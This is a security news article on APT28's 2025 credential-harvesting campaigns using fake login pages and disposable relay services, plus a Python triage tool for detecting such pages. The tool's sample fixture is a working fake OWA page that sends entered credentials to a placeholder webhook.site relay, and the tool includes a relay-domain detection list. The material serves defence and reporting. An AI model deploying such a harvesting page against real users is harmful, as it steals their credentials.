Russian state-sponsored threat actors have been linked to a new set of credential harvesting attacks targeting individuals associated with Turkey’s Energy and Nuclear Research Agency, as well as employees associated with a European think tank and organizations in North Macedonia and Uzbekistan.
The activity has been attributed to APT28 (aka BlueDelta), which was tied to a "persistent" credential-harvesting campaign against UKR[.]net users last month. APT28 is linked to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
"The use of Turkish-language and regionally targeted lure content shows that BlueDelta has tailored its content to enhance credibility among specific professional and geographic audiences," Recorded Future's Insikt Group said. "These selections reflect continued interest in organizations associated with energy research, defense cooperation, and government communications networks related to Russian intelligence priorities."
The cybersecurity company described the attacks as targeting a small but specific set of victims between February and September 2025, with the campaign relying on fake login pages styled to resemble popular services such as Microsoft Outlook Web Access (OWA), Google, and the Sophos VPN portal.
The campaigns are notable in that victims are redirected to a legitimate site after entering their credentials on the fake landing page, so nothing obviously amiss is shown to the user. Recorded Future also found that the campaigns rely heavily on free or disposable services, namely webhook[.]site, InfinityFree, Byte Internet Services, and Ngrok, to host the phishing pages, receive the stolen credentials, and perform the redirection.
To further the facade of legitimacy, the threat actors used genuine PDF documents as lures, including a Gulf Research Center publication on the June 2025 Iran-Israel war and a July 2025 policy briefing on a new agreement for the Mediterranean issued by the climate-change think tank ECCO.
The attack chain begins with a phishing email containing a shortened link. Clicking it redirects the victim to a webhook[.]site URL that displays the decoy document for roughly two seconds before redirecting again to a second webhook[.]site URL hosting a fake Microsoft OWA login page.
The OWA page contains a hidden HTML form element that stores a webhook[.]site URL. JavaScript on the page uses that URL to send a "page opened" beacon, transmit whatever credentials are submitted to the webhook endpoint, and finally redirect the victim to the PDF hosted on the legitimate website, so the visit ends on a real document rather than an error.
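The page structure described above (a hidden field holding a relay URL, a beacon/POST from inline script, and a post-submit redirect to a legitimate site) is also a detection opportunity for anyone triaging a suspected phishing page, and the same check covers the disposable-infrastructure abuse noted earlier. The following is an added example, not code from Recorded Future or from the campaign itself: a stdlib-only static analyzer that parses a saved page, looks for form actions or hidden values pointing at relay domains, inline-script use of fetch/XMLHttpRequest/sendBeacon, and JavaScript or meta-refresh redirects. The relay domain list is an assumption (webhook.site and the Ngrok domains are well known; the InfinityFree hostnames are a guess to be replaced with your own intel), and the sample page, its placeholder webhook UUID and the example.org decoy host are constructed for the demo.

```python
"""Static triage of a suspected credential-harvesting page (added example).

Flags the relay pattern: a hidden field or form action pointing at a
disposable relay, a script that beacons or POSTs, and a post-submit
redirect to a legitimate site. Not the report's or the actor's code.
"""
import re
from html.parser import HTMLParser

# Assumed relay/free-hosting domains. webhook.site and the ngrok domains are
# well known; the InfinityFree hostnames are an assumption for illustration.
RELAY_DOMAINS = ("webhook.site", "ngrok.io", "ngrok-free.app", "ngrok.app",
                 "infinityfreeapp.com", "rf.gd", "great-site.net")

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
# location = '...', location.href = '...', location.replace('...') / assign('...')
REDIRECT_RE = re.compile(
    r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)|location\.(?:replace|assign)\(\s*['\"]([^'\"]+)")
BEACON_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b")


def relay_host(url):
    """Return the hostname if url points at a known relay domain, else None."""
    host = re.sub(r"^https?://", "", url or "", flags=re.I).split("/")[0].split(":")[0].lower()
    for domain in RELAY_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return host
    return None


class PhishPageParser(HTMLParser):
    """Collect forms, hidden-input values, inline scripts and meta refreshes."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self.meta_refresh = [], [], []
        self._form, self._in_script = None, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "hidden": [], "password": 0}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            kind = a.get("type", "text").lower()
            if kind == "hidden":
                self._form["hidden"].append(a.get("value", ""))
            elif kind == "password":
                self._form["password"] += 1
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url=(\S+)", a.get("content", ""), re.I)
            if m:
                self.meta_refresh.append(m.group(1))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # HTMLParser hands script bodies over as raw data
            self.scripts[-1] += data


def analyze(html):
    """Return relay endpoints, redirect targets, indicators and a verdict."""
    p = PhishPageParser()
    p.feed(html)
    relays, redirects, indicators = set(), set(), []
    for f in p.forms:
        for url in [f["action"]] + f["hidden"]:
            host = relay_host(url)
            if host:
                relays.add(host)
                indicators.append("form references relay host " + host)
        if f["password"] and any(URL_RE.match(v) for v in f["hidden"]):
            indicators.append("password form stores a URL in a hidden field")
    js = "\n".join(p.scripts)
    for url in URL_RE.findall(js):
        host = relay_host(url)
        if host:
            relays.add(host)
            indicators.append("script references relay host " + host)
    beacons = bool(BEACON_RE.search(js))
    if beacons:
        indicators.append("script uses fetch/XMLHttpRequest/sendBeacon (beacon or exfil)")
    for m in REDIRECT_RE.finditer(js):
        redirects.add(m.group(1) or m.group(2))
    redirects.update(p.meta_refresh)
    verdict = ("credential-harvesting relay pattern"
               if relays and (redirects or beacons) else "no relay pattern")
    return {"relay_endpoints": relays, "redirect_targets": redirects,
            "indicators": indicators, "verdict": verdict}


# Constructed sample page modelled on the described OWA lure (placeholder UUID,
# example.org standing in for the legitimate host that serves the decoy PDF).
SAMPLE_PAGE = """<!doctype html><html><head><title>Outlook</title></head><body>
<form id="loginForm" method="post">
  <input type="hidden" name="relay" value="https://webhook.site/00000000-0000-0000-0000-000000000000">
  <input type="text" name="username"><input type="password" name="password">
  <button type="submit">Sign in</button>
</form>
<script>
  var relay = document.querySelector('input[name=relay]').value;
  fetch(relay + '?event=page_opened');
  document.getElementById('loginForm').onsubmit = function (e) {
    e.preventDefault();
    fetch(relay, {method: 'POST', body: new FormData(e.target)}).finally(function () {
      window.location.href = 'https://example.org/report.pdf';
    });
  };
</script></body></html>"""

# Constructed benign login form for comparison (no relay, no redirect script).
BENIGN_PAGE = """<form action="/login" method="post">
<input type="hidden" name="csrf" value="abc123"><input type="password" name="p"></form>"""

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_PAGE).items():
        print(key, ":", value)
```

Run it against a page saved from a sandboxed browser session rather than fetching the URL from a production host; the heuristic is intentionally loose (any relay host plus a beacon or redirect), so treat its verdict as a triage signal to pair with the proxy logs showing the webhook[.]site to legitimate-site hop, not as proof on its own.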
APT28 has also been observed running three other campaigns –
- A June 2025 campaign that deployed a credential-harvesting page mimicking the Sophos VPN password reset page, hosted on InfinityFree infrastructure, to collect credentials entered into the form and then redirect victims to the legitimate Sophos VPN portal of an unnamed EU think tank.
- A September 2025 campaign in which credential-harvesting pages hosted on InfinityFree domains were used to falsely warn users about expired passwords to trick them into entering their credentials and redirect them to legitimate login pages associated with a military organization in the Republic of North Macedonia and an IT integrator based in Uzbekistan.
- An April 2025 campaign that used a fake Google password reset page hosted on Byte Internet Services to collect victims' credentials and then redirect them to an Ngrok URL.
"BlueDelta's continued abuse of legitimate Internet service infrastructure reflects the group's continued reliance on disposable services to host and relay credential data," the Mastercard-owned company said. "These campaigns underscore the GRU's continued commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives."